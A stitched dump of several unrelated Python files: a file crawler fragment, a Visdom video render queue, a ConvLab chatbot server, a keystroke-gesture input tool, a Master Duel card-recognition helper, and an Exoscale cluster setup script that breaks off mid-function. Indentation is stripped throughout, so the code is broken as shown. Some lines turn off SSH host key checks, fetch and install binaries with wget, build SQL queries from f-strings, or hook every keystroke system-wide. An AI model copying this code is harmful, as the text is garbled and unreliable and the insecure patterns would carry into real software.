print("[!] User interrupt.")
try:
for process in processList:
process.terminate()
sys.exit(0)
except SystemExit:
os._exit(0)
# end do
## Calculates and returns the processing status
# @return string
def _getProcessStatus(self) -> str:
return str(round(self.processedFileCount.value / self.fileListSize * 100, 2))
## Print function for crawler program messages
# - message will be printed if stdout is disabled
def _printCrawlerMessage(self, msg:str) -> None:
if not self.printToStdOut:
if msg:
print(msg)
# end def _printCrawlerMessage
## Print function for crawler results
# - message will be printed if stdout is enabled
def _printCrawlerResult(self, printDictSrc:dict) -> None:
if self.printToStdOut:
printStr = ""
for item in self.result_columns:
# colored output for match
if item == "match" and self.matchHighligting:
printStr += "\x1b[0;30;41m" + printDictSrc[item] + "\x1b[0m "
else:
printStr += printDictSrc[item] + " "
print(printStr[:-1])
# end _printCrawlerResult
# end class crawler
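
# --- Illustrative sketch (assumption: not part of the original module) ---
# _processBlock() reads bufSize + overlap bytes per iteration but only counts
# matches that start inside the first bufSize bytes, then seeks back by
# `overlap`, so a pattern spanning a block boundary is still found exactly
# once. A minimal standalone version of that windowing idea:
def overlapped_blocks(f, buf_size=32384, overlap=1024):
    """Yield (offset, buffer) pairs over file object f; each buffer carries
    `overlap` extra bytes, and callers should only accept hits whose start
    offset within the buffer is < buf_size."""
    pos = 0
    while True:
        f.seek(pos)
        buf = f.read(buf_size + overlap)
        if not buf:
            return
        yield pos, buf
        if len(buf) < buf_size + overlap:
            return
        pos += buf_size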
|
render.py
|
# Copyright (c) 2021-present, Facebook, Inc.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
#
import atexit
import io
import logging
import tempfile
from base64 import b64encode
from typing import List, Optional
import imageio
import matplotlib
import matplotlib.patheffects as pe
import numpy as np
import torch as th
import torch.multiprocessing as mp
from matplotlib import pyplot as plt
from visdom import Visdom
log = logging.getLogger(__name__)
class RenderQueue:
'''
An asynchronous queue for plotting videos to visdom.
'''
def __init__(self, viz: Optional[Visdom] = None):
self.viz = viz
self.queue = mp.Queue()
self.p = mp.Process(target=self.run, args=(self.queue, viz))
self.p.start()
self._call_close = lambda: self.close()
atexit.register(self._call_close)
def close(self):
self.queue.put({'msg': 'quit'})
self.p.join()
atexit.unregister(self._call_close)
def push(
self,
img: th.Tensor,
s_left: List[str] = None,
s_right: List[str] = None,
) -> None:
self.queue.put(
{'msg': 'push', 'img': img, 's_left': s_left, 's_right': s_right}
)
def plot(self) -> None:
if self.viz is None:
            raise RuntimeError('No visdom instance configured')
self.queue.put({'msg': 'plot'})
def save(self, path: str) -> None:
self.queue.put({'msg': 'save', 'path': path})
@staticmethod
def run(queue: mp.Queue, viz: Optional[Visdom] = None):
matplotlib.use('svg')
imgs = []
log.debug('Render queue running')
while True:
item = queue.get()
msg = item['msg']
if msg == 'quit':
break
elif msg == 'push':
imgs.append(item['img'])
if item['s_left'] or item['s_right']:
draw_text(
imgs[-1], s_left=item['s_left'], s_right=item['s_right']
)
elif msg == 'plot' and viz:
log.debug(f'Plotting video with {len(imgs)} frames to visdom')
try:
plot_visdom_video(viz, imgs)
                except Exception:
log.exception('Error plotting video')
imgs.clear()
elif msg == 'save':
log.debug(
f'Saving video with {len(imgs)} frames as {item["path"]}'
)
try:
video_data = video_encode(imgs)
with open(item['path'], 'wb') as f:
f.write(video_data)
                except Exception:
log.exception('Error saving video')
imgs.clear()
def video_encode(imgs: List[th.Tensor], fps: int = 24):
'''
Encode a list of RGB images (HxWx3 tensors) to H264 video, return as a
binary string.
'''
# TODO Can I write directly to a bytesIO object?
with tempfile.NamedTemporaryFile(suffix='.mp4') as tmp:
w = imageio.get_writer(
tmp.name, format='FFMPEG', mode='I', fps=fps, codec='h264'
)
for img in imgs:
w.append_data(img.numpy())
w.close()
data = open(tmp.name, 'rb').read()
return data
def draw_text(
img: th.Tensor, s_left: List[str] = None, s_right: List[str] = None
):
'''
Render text on top of an image (using matplotlib). Modifies the image
in-place.
img: The RGB image (HxWx3)
s_left: Lines of text, left-aligned, starting from top
s_right: Lines of text, right-aligned, starting from top
'''
dpi = 200
fig = plt.figure(frameon=False)
fig.set_size_inches(img.shape[1] / dpi, img.shape[0] / dpi)
fig.set_dpi(dpi)
ax = plt.Axes(fig, [0.0, 0.0, 1, 1])
ax.set_axis_off()
fig.add_axes(ax)
ax.imshow(img, interpolation='none')
fd = {'color': 'lime'}
    fs = 8
    # check the smallest heights first so each range gets its own font size
    if img.shape[0] < 150:
        fs = 2
    elif img.shape[0] < 250:
        fs = 4
    elif img.shape[0] < 400:
        fs = 6
for i, s in enumerate(s_left if s_left is not None else []):
if isinstance(s, tuple):
s, c = s[0], s[1]
else:
c = fd
txt = fig.text(0, 1 - i * 0.05, s, c, fontsize=fs, va='top', ha='left')
txt.set_path_effects(
[pe.Stroke(linewidth=0.4, foreground='black'), pe.Normal()]
)
for i, s in enumerate(s_right if s_right is not None else []):
if isinstance(s, tuple):
s, c = s[0], s[1]
else:
c = fd
txt = fig.text(1, 1 - i * 0.05, s, c, fontsize=fs, va='top', ha='right')
txt.set_path_effects(
[pe.Stroke(linewidth=0.4, foreground='black'), pe.Normal()]
)
fig.canvas.draw()
buf = io.BytesIO()
fig.savefig(buf, format='rgba', dpi=dpi)
buf.seek(0)
data = np.frombuffer(buf.read(), dtype=np.uint8)
rgba_shape = (img.shape[0], img.shape[1], 4)
# Skip alpha channel when copying back to img
img.copy_(th.from_numpy(data.reshape(rgba_shape)[:, :, :3].copy()))
plt.close(fig)
def plot_visdom_video(
viz: Visdom, images: List[th.Tensor], show_progress=False, **kwargs
):
'''
Plot array of RGB images as a video in Visdom.
'''
video_data = video_encode(images)
encoded = b64encode(video_data).decode('utf-8')
html = f'<video controls><source type="video/mp4" src="data:video/mp4;base64,{encoded}">Your browser does not support the video tag.</video>'
viz.text(text=html)
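
# --- Usage sketch (illustrative; assumes a visdom server is running) ---
# q = RenderQueue(Visdom())
# for frame in frames:              # frames: HxWx3 uint8 torch tensors
#     q.push(frame, s_left=['step 1'])
# q.plot()                          # encode frames and send to visdom
# q.save('/tmp/rollout.mp4')        # or write the H264 video to disk
# q.close()                         # drain the queue and join the worker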
|
bot_server.py
|
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
import os
import sys
sys.path.append('../../')
from convlab.agent import Body
from convlab.agent import DialogAgent
from convlab.spec import spec_util
from convlab.env import make_env
import numpy as np
import copy
from flask import Flask, request, jsonify
from queue import PriorityQueue
from threading import Thread
rgi_queue = PriorityQueue(maxsize=0)
rgo_queue = PriorityQueue(maxsize=0)
app = Flask(__name__)
os.environ['lab_mode'] = 'eval'
spec_file = sys.argv[1]
spec_name = sys.argv[2]
lab_mode, prename = sys.argv[3].split('@')
spec = spec_util.get_eval_spec(spec_file, prename)
spec = spec_util.override_eval_spec(spec)
agent_spec = spec['agent'][0]
env = make_env(spec)
body = Body(env, spec['agent'])
agent = DialogAgent(spec, body)
last_obs = 'hi'
agent.reset(last_obs)
# obs = 'hi can you find me a hotel in the west?'
# action = agent.act(obs)
# next_obs = 'we have six people'
# agent.update(obs, action, 0, next_obs, 0)
# action = agent.act(next_obs)
@app.route('/', methods=['GET', 'POST'])
def process():
try:
in_request = request.json
print(in_request)
    except Exception:
        return "invalid input"
rgi_queue.put(in_request)
rgi_queue.join()
output = rgo_queue.get()
print(output['response'])
rgo_queue.task_done()
# return jsonify({'response': response})
return jsonify(output)
def generate_response(in_queue, out_queue):
while True:
# pop input
in_request = in_queue.get()
obs = in_request['input']
if in_request['agent_state'] == {}:
agent.reset(obs)
else:
encoded_state, dst_state = in_request['agent_state']
agent.body.encoded_state = np.asarray(encoded_state) if isinstance(encoded_state, list) else encoded_state
agent.dst.state = copy.deepcopy(dst_state)
try:
action = agent.act(obs)
agent.update(obs, action, 0, obs, 0)
encoded_state = agent.body.encoded_state.tolist() if isinstance(agent.body.encoded_state,
np.ndarray) else agent.body.encoded_state
dst_state = copy.deepcopy(agent.dst.state)
except Exception as e:
print('agent error', e)
try:
if action == '':
                response = 'Sorry, I do not understand, can you paraphrase?'
else:
response = action
except Exception as e:
print('Response generation error', e)
response = 'What did you say?'
out_queue.put({'response': response, 'agent_state': (encoded_state, dst_state)})
in_queue.task_done()
out_queue.join()
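# Note (illustrative): process() and generate_response() form a simple
# request/response handshake over two queues: process() blocks on
# rgi_queue.join() until the worker calls task_done(), reads the reply from
# rgo_queue, and unblocks the worker's out_queue.join() with its own
# task_done() call.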
if __name__ == '__main__':
worker = Thread(target=generate_response, args=(rgi_queue, rgo_queue,))
    worker.daemon = True
worker.start()
app.run(host='0.0.0.0', port=10004)
|
main.py
|
# -*- coding: utf-8 -*-
import keyboard
import os
import threading
import time
from adjacent import is_adjacent, adjacent_rate
from tkinter import *
from queue import Queue
from predict import predict
from functools import partial
import numpy as np
global keyboard_stream
'''
[keyname, event, time]
'''
keyboard_stream = []
keyboard_record = []
keyboard_pressed = []
previous_space_time = 0
started = False # mark that a gesture is on
processed = False # mark it's in the process step
finished = False
previous_time = 0
symbol_count = 0 # count how many symbols have been glided
def convert_to_ms(time):
return int(time*1000) % 100000
def do_press(event):
# init press, start recording
#global started
global started
global previous_time
global finished
if not started:
# record anyway
keyboard_stream.append([event.name, 'press',event.time])
keyboard_pressed.append(event.name)
if event.name in ['space','backspace','enter']:
keyboard_stream.clear()
keyboard_pressed.clear()
else:
if previous_time == 0:
                # first key press since the program started; remember its time in previous_time
previous_time = event.time
            elif previous_time != 0:
# mark that a previous key has been pressed
if event.time - previous_time > 0.3:
# print("previous",previous_time)
# print("now", event.time)
keyboard_stream.clear()
keyboard_pressed.clear()
# too long, clear before store
keyboard_stream.append([event.name, 'press',event.time])
keyboard_pressed.append(event.name)
previous_time = event.time
else:
previous_time = event.time
# for the judgement, add the time evaluation (only care about the press event)
if len(keyboard_pressed) >= 4 and adjacent_rate(keyboard_pressed) > 2/3:
#print("alert!",keyboard_pressed[-1],keyboard_pressed[-2])
print("alert!", keyboard_pressed)
started = True
stop_recording = threading.Timer(1.5, stop_and_process)
stop_recording.start()
else:
if not processed:
keyboard_record.append([event.name, 'press',event.time])
keyboard_pressed.append(event.name)
else:
if event.name in ['1','2','3','4','5','`'] and len(results) != 0:
if event.name == '`':
#pass
for i in range(len(keyboard_pressed)):
keyboard.press('backspace')
keyboard.press('backspace')
finished = True
time.sleep(0.2)
reset()
else:
for i in range(len(keyboard_pressed)):
keyboard.press('backspace')
keyboard.press('backspace')
keyboard.write(results[int(event.name) - 1])
finished = True
time.sleep(0.2)
reset()
#print(event.name, event.scan_code, event.time,"press")
def do_release(event):
if not started:
keyboard_stream.append([event.name, 'release', event.time])
elif started:
        keyboard_record.append([event.name, 'release', event.time])
#print(event.name, event.scan_code, event.time,"release")
#keyboard.write("α")
def listen_keyboard():
#keyboard.add_hotkey('ctrl+q', quit)
#global_timer = time.time() # set initial timer
keyboard.on_press(do_press)
keyboard.on_release(do_release)
keyboard.wait('esc')
print(keyboard_stream)
print()
print(keyboard_pressed)
print()
print(keyboard_record)
#print(raw)
def stop_and_process():
print("stop")
GUI = threading.Thread(target=start_GUI)
GUI.start()
def reset():
keyboard_stream.clear()
keyboard_pressed.clear()
keyboard_record.clear()
global started
global processed
global finished
started = False
processed = False
finished = False
def start_GUI():
    # entering the processing phase
window = Tk()
    # enter the message loop
global results
    window.title('gpk')  # window title
    # window.geometry('450x60')  # window size
center_window(window,450,60)
print("showing window")
#results = ["α","β","Ω","π","μ"]
results = predict(keyboard_pressed)
options = "1." + results[0] + " 2." + results[1] + " 3." + results[2] + " 4." + results[3] + " 5." + results[4]
options = Label(window, text = options, width = 30, height = 2,anchor=NW,font=("Consolas",30))
options.pack()
raise_window_up(window)
global processed
processed = True
close_thread = threading.Thread(target=partial(detect_and_close,window))
close_thread.start()
window.mainloop()
def raise_window_up(window):
window.attributes('-topmost', 1)
def get_screen_size(window):
return window.winfo_screenwidth(),window.winfo_screenheight()
def get_window_size(window):
return window.winfo_reqwidth(),window.winfo_reqheight()
def center_window(window, width, height):
screenwidth = window.winfo_screenwidth()
screenheight = window.winfo_screenheight()
size = '%dx%d+%d+%d' % (width, height, (screenwidth - width)/2, (screenheight - height)/2)
print(size)
window.geometry(size)
def detect_and_close(window):
    while 1:
        if finished:
            window.destroy()
            break
        time.sleep(0.05)  # avoid busy-spinning while waiting for the flag
if __name__ == '__main__':
listen = threading.Thread(target=listen_keyboard)
listen.start()
# stop_recording = threading.Thread(target=stop_and_process)
# stop_recording.start()
|
master_duel_auto_scan_version.py
|
import os
from re import M
import sys
from threading import Thread
import time
from PIL import Image, ImageFile
import dhash
import sqlite3
import win32api
import win32process
import win32gui
import win32ui
import win32con
import win32print
from ctypes import windll
import keyboard
ImageFile.LOAD_TRUNCATED_IMAGES = True
Image.MAX_IMAGE_PIXELS = None
# global variable to pass card to gui
g_card_show = None
_img_p = ['.png', '.jpg']
# ygo card image area y1-y2
y_1 = (130/700)
y_2 = (490/700)
# ygo card image area x1-x2
x_1 = (60/480)
x_2 = (424/480)
# how many of the most-similar entries to show per detection (mitigates possible recognition errors)
show_search_limit = 1
md_process_name = 'masterduel.exe'
md_process_window_name = 'masterduel'
# for regenerate card image
fileDir = './origin_ygo_img'
c_dhash_dir = './card_image_check.db'
c_ygo_dir = './cards.cdb'
pause_hotkey = 'ctrl+p'
exit_hotkey = 'ctrl+q'
switch_hotkey = 'ctrl+s'
# for debug
#debug_raw_img1 = './simple_img/s5.png'
# screen_shot for 1920X1080
# shot where card image locate
# deck
deck_left_top = (64, 200)
deck_right_bottom = (64+144, 200+210)
# duel
duel_left_top = (40, 208)
duel_right_bottom = (40+168, 208+244)
def cls():
os.system('cls' if os.name == 'nt' else 'clear')
def hammingDist(s1, s2):
assert len(s1) == len(s2)
return sum([ch1 != ch2 for ch1, ch2 in zip(s1, s2)])
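# Example (illustrative): hammingDist('0f3a', '0f7a') == 1; translate() below
# turns this distance over the hex dhash strings into a similarity score,
# where 1.0 means the two fingerprints are identical.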
def getFileList(dir, fileList):
newDir = dir
if os.path.isfile(dir):
fileList.append(dir)
elif os.path.isdir(dir):
for s in os.listdir(dir):
if os.path.splitext(s)[-1] not in _img_p:
continue
newDir = os.path.join(dir, s)
getFileList(newDir, fileList)
return fileList
def generate_card_img_basic_dhash(_list):
conn = sqlite3.connect(c_dhash_dir)
c = conn.cursor()
c.execute(
''' SELECT count(name) FROM sqlite_master WHERE type='table' AND name='CardDhash' ''')
if c.fetchone()[0] != 1:
conn.execute(
'''
CREATE TABLE CardDhash
(id INTEGER PRIMARY KEY AUTOINCREMENT,
code TEXT NOT NULL,
dhash TEXT NOT NULL
);'''
)
c.execute(''' SELECT count(*) FROM CardDhash ''')
if c.fetchone()[0] == 0:
counter = 0
for _img_path in _list:
_img = Image.open(_img_path)
_y_1 = int(_img.height*y_1)
_y_2 = int(_img.height*y_2)
_x_1 = int(_img.width*x_1)
_x_2 = int(_img.width*x_2)
_img = _img.crop((_x_1, _y_1, _x_2, _y_2))
row, col = dhash.dhash_row_col(_img)
_img.close()
_temp_dhash = dhash.format_hex(row, col)
if _temp_dhash is None:
                print(f'Unable to read {_img_path}, skipping')
continue
counter += 1
_file_name = os.path.basename(_img_path).split('.')[0]
# _cache.append({
# 'code':_file_name,
# 'dhash':_temp_dhash
# })
conn.execute(
f"INSERT INTO CardDhash (code,dhash) VALUES ('{_file_name}', '{_temp_dhash}' )")
print(f"{counter} time,generate card {_file_name} dhash {_temp_dhash}")
print("generate done")
conn.commit()
conn.close()
def get_card_img_dhash_cache():
conn = sqlite3.connect(c_dhash_dir)
c = conn.cursor()
c.execute(
''' SELECT count(name) FROM sqlite_master WHERE type='table' AND name='CardDhash' ''')
if c.fetchone()[0] != 1:
print("No table find")
conn.close()
return None
c.execute(''' SELECT count(*) FROM CardDhash ''')
if c.fetchone()[0] == 0:
print("No data Init")
conn.close()
return None
cache = []
cursor = conn.execute("SELECT code,dhash from CardDhash")
for row in cursor:
cache.append(
{
'code': row[0],
'dhash': row[1]
}
)
conn.close()
return cache
def get_game_window_info():
    hwnd = win32gui.FindWindow(0, md_process_window_name)
    return hwnd
def window_shot_image(hwnd: int):
app = win32gui.GetWindowText(hwnd)
if not hwnd or hwnd <= 0 or len(app) == 0:
        return False, 'Cannot find the game process; doing nothing'
isiconic = win32gui.IsIconic(hwnd)
if isiconic:
        return False, 'The game window is minimized, so the screen image cannot be captured; doing nothing'
left, top, right, bot = win32gui.GetClientRect(hwnd)
w = right - left
h = bot - top
    # get the un-scaled screen resolution
hDc = win32gui.GetDC(0)
_screen_w = win32print.GetDeviceCaps(hDc, win32con.DESKTOPHORZRES)
_screen_h = win32print.GetDeviceCaps(hDc, win32con.DESKTOPVERTRES)
_current_screen_w = win32api.GetSystemMetrics(0)
_current_screen_h = win32api.GetSystemMetrics(1)
desktop_global_resize_w_zoom = _current_screen_w/_screen_w
desktop_global_resize_h_zoom = _current_screen_h/_screen_h
hwndDC = win32gui.GetWindowDC(hwnd)
mfcDC = win32ui.CreateDCFromHandle(hwndDC)
saveDC = mfcDC.CreateCompatibleDC()
saveBitMap = win32ui.CreateBitmap()
saveBitMap.CreateCompatibleBitmap(mfcDC, w, h)
saveDC.SelectObject(saveBitMap)
result = windll.user32.PrintWindow(hwnd, saveDC.GetSafeHdc(), 3)
bmpinfo = saveBitMap.GetInfo()
bmpstr = saveBitMap.GetBitmapBits(True)
im = Image.frombuffer(
'RGB',
(bmpinfo['bmWidth'], bmpinfo['bmHeight']),
bmpstr, 'raw', 'BGRX', 0, 1)
win32gui.DeleteObject(saveBitMap.GetHandle())
saveDC.DeleteDC()
mfcDC.DeleteDC()
win32gui.ReleaseDC(hwnd, hwndDC)
if result != 1:
return False, "无法创建屏幕图像缓存"
print(f"Win32返回的游戏窗口分辨率({w}x{h}),桌面长宽缩放倍率({desktop_global_resize_w_zoom},{desktop_global_resize_h_zoom}),相关坐标将会进行缩放,缩放比率将为({w/1920/desktop_global_resize_w_zoom},{h/1080/desktop_global_resize_h_zoom})")
return True, {
"image": im,
"current_window_zoom": (w/1920/desktop_global_resize_w_zoom, h/1080/desktop_global_resize_h_zoom),
}
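# Note (illustrative): the zoom factors returned above rescale the hard-coded
# 1920x1080 crop rectangles to the actual client-area size, corrected for
# Windows DPI scaling (DESKTOPHORZRES/VERTRES give the physical resolution,
# GetSystemMetrics the scaled one).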
def get_image_db_cache():
generate_card_img_basic_dhash(getFileList(fileDir, []))
_db_image_cache = get_card_img_dhash_cache()
return _db_image_cache
def cv_card_info_at_deck_room(debug: bool = False):
hwnd = get_game_window_info()
status, result = window_shot_image(hwnd)
if not status:
print(result)
return None
zoom_w = result['current_window_zoom'][0]
zoom_h = result['current_window_zoom'][1]
_crop_area = (int(deck_left_top[0]*zoom_w),
int(deck_left_top[1]*zoom_h),
int(deck_right_bottom[0]*zoom_w),
int(deck_right_bottom[1]*zoom_h))
_img = result['image'].crop(_crop_area)
if debug:
print("debug:store first crop deck card locate(first_crop_deck)")
_img.save("./first_crop_deck.png")
_y_1 = int(_img.height*y_1)
_y_2 = int(_img.height*y_2)
_x_1 = int(_img.width*x_1)
_x_2 = int(_img.width*x_2)
_img = _img.crop((_x_1, _y_1, _x_2, _y_2))
if debug:
print("debug:store second crop deck card locate(second_crop_deck)")
_img.save("./second_crop_deck.png")
row, col = dhash.dhash_row_col(_img)
target_img_dhash = dhash.format_hex(row, col)
return target_img_dhash
def cv_card_info_at_duel_room(debug: bool = False):
hwnd = get_game_window_info()
status, result = window_shot_image(hwnd)
if not status:
print(result)
return None
zoom_w = result['current_window_zoom'][0]
zoom_h = result['current_window_zoom'][1]
_crop_area = (int(duel_left_top[0]*zoom_w),
int(duel_left_top[1]*zoom_h),
int(duel_right_bottom[0]*zoom_w),
int(duel_right_bottom[1]*zoom_h))
_img = result['image'].crop(_crop_area)
if debug:
print("debug:store first crop duel card locate(first_crop_duel)")
_img.save("./first_crop_duel.png")
_y_1 = int(_img.height*y_1)
_y_2 = int(_img.height*y_2)
_x_1 = int(_img.width*x_1)
_x_2 = int(_img.width*x_2)
_img = _img.crop((_x_1, _y_1, _x_2, _y_2))
if debug:
print("debug:store second crop duel card locate(second_crop_duel)")
_img.save("./second_crop_duel.png")
row, col = dhash.dhash_row_col(_img)
target_img_dhash = dhash.format_hex(row, col)
return target_img_dhash
def translate(type: int, cache: list, debug: bool = False, ygo_sql_ins=None):
if cache is None or len(cache) == 0:
print("无法读取图像指纹信息,不执行操作(card_image_check.db是不是12K,是的话这是个空库没数据的)")
return
cls()
get_at = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime())
print(f"检测时间:{get_at}")
start_time = time.time()
    if type == 1:
        print("Translating deck card")
        dhash_info = cv_card_info_at_deck_room(debug)
    elif type == 2:
        print("Translating duel card")
        dhash_info = cv_card_info_at_duel_room(debug)
    else:
        print("not supported")
        return
if not dhash_info:
return
results = []
for _img_dhash in cache:
d_score = 1 - hammingDist(dhash_info,
_img_dhash['dhash']) * 1. / (32 * 32 / 4)
results.append({
'card': _img_dhash['code'],
'score': d_score
})
results.sort(key=lambda x: x['score'], reverse=True)
if len(results) > show_search_limit:
results = results[:show_search_limit]
end_time = time.time()
if not ygo_sql_ins:
ygo_sql = sqlite3.connect(c_ygo_dir)
else:
ygo_sql = ygo_sql_ins
for card in results:
try:
cursor = ygo_sql.execute(
f"SELECT name,desc from texts WHERE id='{card['card']}' LIMIT 1")
except:
print("读取ygo数据库异常,是不是没有将card.cdb放进来")
return
if cursor.arraysize != 1:
print(f"card {card['card']} not found")
if not ygo_sql_ins:
ygo_sql.close()
return
data = cursor.fetchone()
print(data)
card['name'] = data[0]
card['desc'] = data[1]
if not ygo_sql_ins:
ygo_sql.close()
    print('Matching took %.6f seconds' % (end_time - start_time))
    print("Recognition results (sorted by match probability, high to low)")
    # pass first result to gui
    global g_card_show
    g_card_show = results[0]
    for card in results:
        if card['score'] < 0.93:
            print("Warning: similarity is very low; the in-game card art may differ from the cached version, or the capture area may be wrong\nSet enable_debug to inspect the captured crops and analyse the cause\n")
        print(
            f"{card['name']} (passcode: {card['card']}, similarity: {card['score']})\n{card['desc']}\n")
    print("-----------------------------------")
    print(f"{switch_hotkey} toggles deck/duel card detection, {pause_hotkey} pauses detection, {exit_hotkey} exits\nMake sure the target card's detail view is open!")
translate_type = 0
pause = True
process_exit = False
enable_debug = False
def translate_check_thread():
global translate_type
global pause
global process_exit
global enable_debug
cache = get_image_db_cache()
ygo_sql = sqlite3.connect(c_ygo_dir)
    while not process_exit:
        if pause:
            cls()
            print("Paused")
            print(
                f"{switch_hotkey} toggles deck/duel card detection, {pause_hotkey} pauses detection, {exit_hotkey} exits\nMake sure the target card's detail view is open!")
        elif translate_type in (0, 1):
            translate(translate_type + 1, cache, enable_debug, ygo_sql)
        else:
            print("Unknown mode")
        time.sleep(1)
    ygo_sql.close()
    print("Program finished")
def status_change(switch: bool, need_pause: bool, should_exit: bool):
    global translate_type
    global pause
    global process_exit
    global enable_debug
    process_exit = should_exit
pause = need_pause
if switch:
translate_type = int(not bool(translate_type))
def main():
# cache=get_image_db_cache()
# enable_debug=False
# print("shift+g翻译卡组卡片,shift+f翻译决斗中卡片,esc关闭\n请确保您已经点开了目标卡片的详细信息!!!")
# keyboard.add_hotkey('shift+g',translate,args=(1,cache,enable_debug))
# keyboard.add_hotkey('shift+f',translate,args=(2,cache,enable_debug))
# keyboard.wait('ctrl+q')
# print("程序结束")
keyboard.add_hotkey(switch_hotkey, status_change,
args=(True, False, False))
keyboard.add_hotkey(exit_hotkey, status_change, args=(False, False, True))
keyboard.add_hotkey(pause_hotkey, status_change, args=(False, True, False))
p = Thread(target=translate_check_thread)
p.start()
p.join()
if __name__ == '__main__':
main()
|
exoscale.py
|
import json
from cs import CloudStack, read_config
import argparse
import os
import paramiko
import base64
import multiprocessing
from collections import OrderedDict
from scp import SCPClient
import time
def print_pretty(json_data):
print(json.dumps(json_data, indent=4, sort_keys=True))
cs = CloudStack(**read_config())
OFFERINGS = {o["name"].lower(): o["id"] for o in cs.listServiceOfferings()["serviceoffering"]}
ZONES = {z["name"].lower(): z["id"] for z in cs.listZones()["zone"]}
SSH_KEY_PAIRS = [kp["name"] for kp in cs.listSSHKeyPairs()["sshkeypair"]]
VIRTUAL_MACHINES = cs.listVirtualMachines()
TEMPLATE_OFFERINGS = cs.listTemplates(templatefilter="executable")
NETWORK_OFFERINGS = cs.listNetworkOfferings()
SECURITY_GROUPS = cs.listSecurityGroups()
INIT_SCRIPT = """
#cloud-config
runcmd:
- apt-get update
- apt-get install -y python3-pip
- touch /ready
""" # noqa
SSH_CMD = "ssh -o StrictHostKeyChecking=no"
SSH_USERNAME = "ubuntu"
SSH_PORT = 22
def create_ssh_session(hostname):
s = paramiko.SSHClient()
s.set_missing_host_key_policy(paramiko.AutoAddPolicy())
s.connect(hostname, SSH_PORT, SSH_USERNAME)
return s
def wait_ready(args):
print("Waiting for environment deployment")
print("This may take take a while")
time.sleep(5)
ips = get_nodes(args).values()
while any(ip is None for ip in ips):
print("Waiting for IP address ...")
time.sleep(5)
ips = get_nodes(args).values()
for ip in ips:
while True:
try:
print("Trying to connect to {} ...".format(ip))
sess = create_ssh_session(ip)
sftp = sess.open_sftp()
break
except paramiko.ssh_exception.NoValidConnectionsError:
time.sleep(5)
while True:
try:
sftp.stat("/ready")
print("{} ready".format(ip))
break
except IOError:
time.sleep(5)
print("Waiting for startup of {}".format(ip))
def create(args):
if os.path.exists(args.env):
print("Error: {} already exists. Destroy the environment "
"or create a new one using the --env switch".format(args.env))
exit(1)
print("Creating {}...".format(args.env))
vms = []
for i in range(args.n):
vms.append(cs.deployVirtualMachine(
name="{}-{}".format(args.name, i),
serviceOfferingId=OFFERINGS[args.offering],
# templateId="4fedad2b-e96c-4a70-95f7-a9142995dba4",
# templateId="709687a4-35a7-4bfe-af24-aa00f3f391e8", # Ubuntu 17.10
templateId="4c9f5519-730f-46cb-b292-4e73ca578947", # Ubuntu 18.04
zoneId=ZONES[args.zone],
userdata=base64.b64encode(INIT_SCRIPT.encode("utf-8")),
keypair=args.keypair))
with open(args.env, "w") as f:
f.write(json.dumps(vms))
wait_ready(args)
print("{} created".format(args.env))
def destroy(args):
print("Destroying {}...".format(args.env))
with open(args.env, "r") as f:
vms = json.loads(f.read())
for vm in vms:
cs.destroyVirtualMachine(id=vm["id"])
os.remove(args.env)
print("{} destroyed".format(args.env))
def get_nodes(args):
with open(args.env, "r") as f:
ids = [vm["id"] for vm in json.loads(f.read())]
ips = OrderedDict((vm["name"], vm["nic"][0].get("ipaddress"))
for vm in cs.listVirtualMachines()["virtualmachine"]
if vm["id"] in ids)
return ips
def list_ips(args):
print("Listing IP addresses...")
print(get_nodes(args))
def ssh(args):
ip = list(get_nodes(args).values())[args.n]
os.system("{} {}@{}".format(SSH_CMD, SSH_USERNAME, ip))
def _scp(node, src, dst):
sess = create_ssh_session(node)
scp = SCPClient(sess.get_transport())
scp.put(src, recursive=True, remote_path=dst)
sess.close()
def scp(args):
nodes = list(get_nodes(args).values())
if args.n is not None:
nodes = [nodes[args.n]]
processes = []
for n in nodes:
p = multiprocessing.Process(target=_scp, args=(n, args.src, args.dst))
p.start()
processes.append(p)
[p.join() for p in processes]
def _cmd(node, cmd):
sess = create_ssh_session(node)
stdin, stdout, stderr = sess.exec_command(cmd)
print(stderr.read())
print(stdout.read().decode("utf-8"))
sess.close()
def cmd(args):
nodes = list(get_nodes(args).values())
if args.n is not None:
nodes = [nodes[args.n]]
processes = []
for n in nodes:
p = multiprocessing.Process(target=_cmd, args=(n, args.cmd))
p.start()
processes.append(p)
[p.join() for p in processes]
def install_node(k, nodes, hosts, pub_key):
sess = create_ssh_session(nodes[k])
channel = sess.invoke_shell()
stdin = channel.makefile("wb")
stdout = channel.makefile("rb")
stderr = channel.makefile_stderr("rb")
stdin.write("echo '{}' >> ~/.ssh/authorized_keys\n".format(pub_key))
stdin.write("echo -e '{}' | sudo tee --append /etc/hosts\n".format(hosts))
    if args.rain_binary:
        os.system("scp {} {}@{}:~/rain".format(args.rain_binary, SSH_USERNAME, nodes[k]))
stdin.write("sudo mv ~/rain /usr/local/bin/rain\n")
if args.rain_wheel:
rain_whl = os.path.basename(args.rain_wheel)
os.system("scp {} {}@{}:~/{}".format(args.rain_wheel, SSH_USERNAME, nodes[k], rain_whl))
stdin.write("pip3 install ~/{}\n".format(rain_whl))
if args.rain_download:
url_base = "https://github.com/substantic/rain/releases/download"
nightly = ""
if ".dev" in args.rain_download:
nightly = "nightly-"
bin_url = ("{}/{}v{}/rain-v{}-linux-x64.tar.xz"
.format(url_base, nightly, args.rain_download, args.rain_download))
stdin.write("wget -O ~/rain.tar.xz {}\n".format(bin_url))
stdin.write("tar xf ~/rain.tar.xz\n")
stdin.write("sudo mv ./rain-v{}-linux-x64/rain /usr/local/bin/\n"
.format(args.rain_download))
rain_whl = "rain_python-{}-py3-none-any.whl".format(args.rain_download)
python_url = ("{}/{}v{}/{}"
.format(url_base, nightly, args.rain_download, rain_whl))
stdin.write("wget {}\n".format(python_url))
stdin.write("pip3 install ~/{}\n".format(rain_whl))
stdin.write("echo -e '{}' > ~/node-list\n".format("\n".join(nodes)))
stdin.write("exit\n")
print(stderr.read())
print(stdout.read().decode("utf-8"))
stdout.close()
stdin.close()
sess.close()
def install(args):
print("Installing Rain...")
nodes = get_nodes(args)
server_ip = list(nodes.values())[0]
os.popen("{} {}@{} \"ssh-keygen -t rsa -N '' -f ~/.ssh/id_rsa\""
.format(SSH_CMD, SSH_USERNAME, server_ip)).read()
pub_key = os.popen("{} {}@{} \"cat ~/.ssh/id_rsa.pub\""
.format(SSH_CMD, SSH_USERNAME, server_ip)).read().rstrip()
